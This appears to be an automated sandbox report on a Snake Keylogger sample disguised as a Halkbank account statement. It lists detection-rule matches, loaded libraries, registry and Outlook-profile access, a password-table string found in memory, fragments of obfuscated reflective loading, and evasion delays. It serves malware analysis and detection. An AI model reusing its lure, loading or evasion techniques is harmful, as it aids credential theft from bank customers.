                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, 2Ac.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, 2Ac.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, FHTwk1OmDHvQcjT4D9.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, xPlBfKlGB2IZMVKKlN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, xPlBfKlGB2IZMVKKlN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Halkbank_Ekstre_20230426_075819_154055.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMutant created: NULL
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3223175561.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeVirustotal: Detection: 55%
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeReversingLabs: Detection: 44%
                  Source: unknownProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: krUK.pdbSHA256COI source: Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Binary string: krUK.pdb source: Halkbank_Ekstre_20230426_075819_154055.exe

                  Data Obfuscation

                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, FHTwk1OmDHvQcjT4D9.cs.Net Code: I9aF6WgXIVr2f97mNYk System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, FHTwk1OmDHvQcjT4D9.cs.Net Code: I9aF6WgXIVr2f97mNYk System.Reflection.Assembly.Load(byte[])
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: 0xF32F70C2 [Wed Apr 15 21:42:26 2099 UTC]
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_01001A60 push esp; retf 3_2_01001A4F
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: section name: .text entropy: 7.95952575244103
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 2510000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 2770000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 26A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 7370000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 8370000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 8610000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 9610000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 1000000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 29A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: 27E0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599610Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599485Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 596310Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 596197Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 596079Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595954Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595591Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595366Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595196Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 595079Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594954Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594829Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594704Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593610Jump to behavior
